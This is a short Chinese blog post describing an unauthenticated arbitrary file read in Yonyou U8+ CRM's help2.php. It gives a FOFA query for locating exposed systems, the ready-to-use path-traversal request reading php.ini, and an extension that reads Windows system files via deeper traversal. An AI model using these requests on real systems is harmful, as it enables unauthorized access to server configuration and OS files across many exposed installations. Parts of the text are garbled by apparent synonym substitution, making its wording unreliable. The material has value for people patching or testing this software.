用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情形下即可进行漏洞利用。
#头条首发寻衅赛#

1.1 漏洞级别

高危

1.2 快速检索

fofa语法: title="用友U8CRM"1.3 漏洞复现

该漏洞利用非常大略,只需布局get要求

用友php用友U8CRM体系help2 随意率性文件读取破绽复现 JavaScript

url/pub/help2.php?key=/../../apache/php.ini

访问该地址即可触发漏洞

1.4 进一步利用

通过上一步我们已经可以成功的访问一些敏感的配置文件了,那我们如何进一步的读取操作系统的敏感文件呢?

上文中我们可以访问php.ini文件,在该文件中搜索error_log,我们可以得到U8的实际安装路径

以是从我的安装路径来看

/../../apache/php.ini 等价于c://U8SOFT/turbocrm70/apache/php.ini

因此如果我们想要获取系统文件内容,如

c://windows/system.ini

则可以布局下列相对路径:

/../../../../windows/system.ini即布局链接:url/pub/help2.php?key=/../../../../windows/system.ini

可以看到文件读取成功。

这个漏洞相对来说比较大略,但是我看很多复现都没有进一步读取系统文件的解析。
因此写了这个剖析文章希望对大家有用~